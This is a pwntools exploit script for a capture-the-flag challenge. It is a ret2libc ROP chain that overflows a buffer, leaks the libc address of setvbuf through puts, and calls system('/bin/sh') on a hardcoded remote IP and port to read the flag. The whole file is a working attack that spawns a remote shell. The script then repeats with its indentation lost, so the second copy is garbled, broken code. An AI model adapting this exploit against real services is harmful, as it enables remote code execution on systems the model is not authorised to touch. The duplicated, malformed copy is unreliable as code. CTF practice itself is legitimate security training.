KaoRz/random_present.py

## random_present.py
from pwn import *

context(os = "linux", arch = "amd64")
# context.log_level = 'DEBUG'
context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./chall')
libc = ELF('./libc6_2.19-0ubuntu6.14_amd64.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process(elf.path)

def screen_clean():
        sys.stdout.write("\033[F")
        sys.stdout.write("\033[K")

p = remote('199.247.6.180', 10005)

leak = flat(
        "A" * 40,
        0x000000000040077b,             # 0x000000000040077b : pop rdi ; ret
        elf.got['setvbuf'],
        elf.sym['puts'],
        0x0000000000400676              # main address
        )

p.sendlineafter('ROP me!\n', leak)

setvbuf_leak = u64(p.recvline()[:-1].ljust(8, '\x00'))
log.success('Setvbuf leaked address: ' + hex(setvbuf_leak))
setvbuf_offset = libc.sym['setvbuf']
libc.address = setvbuf_leak - setvbuf_offset

while((libc.address & 0xfff) != 0x0):
        log.info('Wrong GLIBC detected. Retrying...')
        p.close()
        screen_clean()
        p = remote('199.247.6.180', 10005)
        screen_clean()
        p.sendlineafter('ROP me!\n', leak)
        setvbuf_leak = u64(p.recvline()[:-1].ljust(8, '\x00'))
        log.success('Setvbuf leaked address: ' + hex(setvbuf_leak))
        libc.address = setvbuf_leak - setvbuf_offset
        sleep(1)

log.success('GLIBC address: ' + hex(libc.address))
log.success('System address: ' + hex(libc.sym['system']))
log.success('String /bin/sh address: ' + hex(libc.search('/bin/sh').next()))

log.info('Getting shell...')
boom = flat(
        "A" * 40,
        0x000000000040077b,             # 0x000000000040077b : pop rdi ; ret
        libc.search('/bin/sh').next(),
        libc.sym['system'],
        libc.sym['exit']
        )

p.sendlineafter('ROP me!\n', boom)
p.sendline('cat flag')
log.success('Flag: ' + p.recvline())
p.close()
	from pwn import *

	context(os = "linux", arch = "amd64")
	# context.log_level = 'DEBUG'
	context.terminal = ['tmux', 'splitw', '-h']

	elf = ELF('./chall')
	libc = ELF('./libc6_2.19-0ubuntu6.14_amd64.so')
	# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	# p = process(elf.path)

	def screen_clean():
	sys.stdout.write("\033[F")
	sys.stdout.write("\033[K")

	p = remote('199.247.6.180', 10005)

	leak = flat(
	"A" * 40,
	0x000000000040077b, # 0x000000000040077b : pop rdi ; ret
	elf.got['setvbuf'],
	elf.sym['puts'],
	0x0000000000400676 # main address
	)

	p.sendlineafter('ROP me!\n', leak)

	setvbuf_leak = u64(p.recvline()[:-1].ljust(8, '\x00'))
	log.success('Setvbuf leaked address: ' + hex(setvbuf_leak))
	setvbuf_offset = libc.sym['setvbuf']
	libc.address = setvbuf_leak - setvbuf_offset

	while((libc.address & 0xfff) != 0x0):
	log.info('Wrong GLIBC detected. Retrying...')
	p.close()
	screen_clean()
	p = remote('199.247.6.180', 10005)
	screen_clean()
	p.sendlineafter('ROP me!\n', leak)
	setvbuf_leak = u64(p.recvline()[:-1].ljust(8, '\x00'))
	log.success('Setvbuf leaked address: ' + hex(setvbuf_leak))
	libc.address = setvbuf_leak - setvbuf_offset
	sleep(1)

	log.success('GLIBC address: ' + hex(libc.address))
	log.success('System address: ' + hex(libc.sym['system']))
	log.success('String /bin/sh address: ' + hex(libc.search('/bin/sh').next()))

	log.info('Getting shell...')
	boom = flat(
	"A" * 40,
	0x000000000040077b, # 0x000000000040077b : pop rdi ; ret
	libc.search('/bin/sh').next(),
	libc.sym['system'],
	libc.sym['exit']
	)

	p.sendlineafter('ROP me!\n', boom)
	p.sendline('cat flag')
	log.success('Flag: ' + p.recvline())
	p.close()